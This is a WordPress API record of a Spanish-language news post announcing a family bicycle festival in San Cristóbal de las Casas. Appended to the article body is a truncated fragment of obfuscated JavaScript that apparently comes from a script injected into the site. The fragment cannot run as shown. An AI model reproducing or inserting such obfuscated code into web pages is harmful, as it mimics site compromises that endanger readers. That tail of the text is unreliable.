{"id":22302,"date":"2025-06-06T03:57:26","date_gmt":"2025-06-06T03:57:26","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=22302"},"modified":"2025-06-06T03:57:27","modified_gmt":"2025-06-06T03:57:27","slug":"celebran-dia-mundial-de-la-bicicleta-con-festival-familiar-en-sclc","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=22302","title":{"rendered":"Celebran D\u00eda Mundial de la Bicicleta con festival familiar en SCLC"},"content":{"rendered":"\n<figure class=\"wp-block-gallery has-nested-images columns-default is-cropped wp-block-gallery-1 is-layout-flex wp-block-gallery-is-layout-flex\">\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"681\" height=\"960\" data-id=\"22303\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/06\/1000154785.jpg\" alt=\"\" class=\"wp-image-22303\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/06\/1000154785.jpg 681w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/06\/1000154785-213x300.jpg 213w\" sizes=\"auto, (max-width: 681px) 100vw, 681px\" \/><\/figure>\n<\/figure>\n\n\n\n<p>Yolanda Rodriguez\/ corresponsal<br>5 de junio del 2025. San Crist\u00f3bal de las Casas.- En el marco del D\u00eda Mundial de la Bicicleta, colectivos ciudadanos y organizaciones locales invitan a la comunidad a sumarse al Festival de la Bicicleta, que se llevar\u00e1 a cabo este domingo 8 de junio en el Centro Cultural El Rastro.<\/p>\n\n\n\n<p>La jornada iniciar\u00e1 con una rodada familiar desde la Plaza Catedral, con reuni\u00f3n a las 10:00 a.m. y salida programada a las 10:30 a.m., rumbo al centro cultural, donde se desarrollar\u00e1n diversas actividades recreativas, deportivas y culturales.<\/p>\n\n\n\n<p>Entre las actividades destacadas del festival se encuentran: Taller de yoga.Taller de mec\u00e1nica de bicicletas. Taller de circo social. Taller de calentamiento para ciclistas y Loter\u00eda vial<\/p>\n\n\n\n<p>Adem\u00e1s, el evento contar\u00e1 con espect\u00e1culos art\u00edsticos para toda la familia, como presentaciones de break dance, un concierto musical con ukelele y una demostraci\u00f3n de danza a\u00e9rea.<\/p>\n\n\n\n<p>Este evento forma parte del camino rumbo al 3er Foro Nacional de la Bicicleta, que tendr\u00e1 lugar en San Crist\u00f3bal, y busca fomentar una cultura de movilidad sostenible, convivencia comunitaria y respeto por el espacio p\u00fablico.<\/p>\n\n\n\n<p>Organizan San Cris con Bici, Foro Nacional de la Bicicleta M\u00e9xico, Foro Mundial de la Bicicleta \u2013 World Bicycle Forum y Bicicatl\u00e1n San Crist\u00f3bal de las Casas. &#8220;Les esperamos para rodar, disfrutar y celebrar juntos el poder de la bicicleta&#8221;, concluyeron los organizadores.<\/p>\n\n\n\n<p><\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>Yolanda Rodriguez\/ corresponsal5 de junio del 2025. San Crist\u00f3bal de las Casas.- En el marco del D\u00eda Mundial de la Bicicleta, colectivos ciudadanos y organizaciones locales invitan a la comunidad a sumarse al Festival de la Bicicleta, que se llevar\u00e1 a cabo este domingo 8 de junio en el Centro Cultural El Rastro. La jornada &hellip;<\/p>\n","protected":false},"author":2,"featured_media":22303,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[7],"tags":[],"class_list":["post-22302","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-chiapas"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/22302","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=22302"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/22302\/revisions"}],"predecessor-version":[{"id":22304,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/22302\/revisions\/22304"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/22303"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=22302"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=22302"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=22302"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}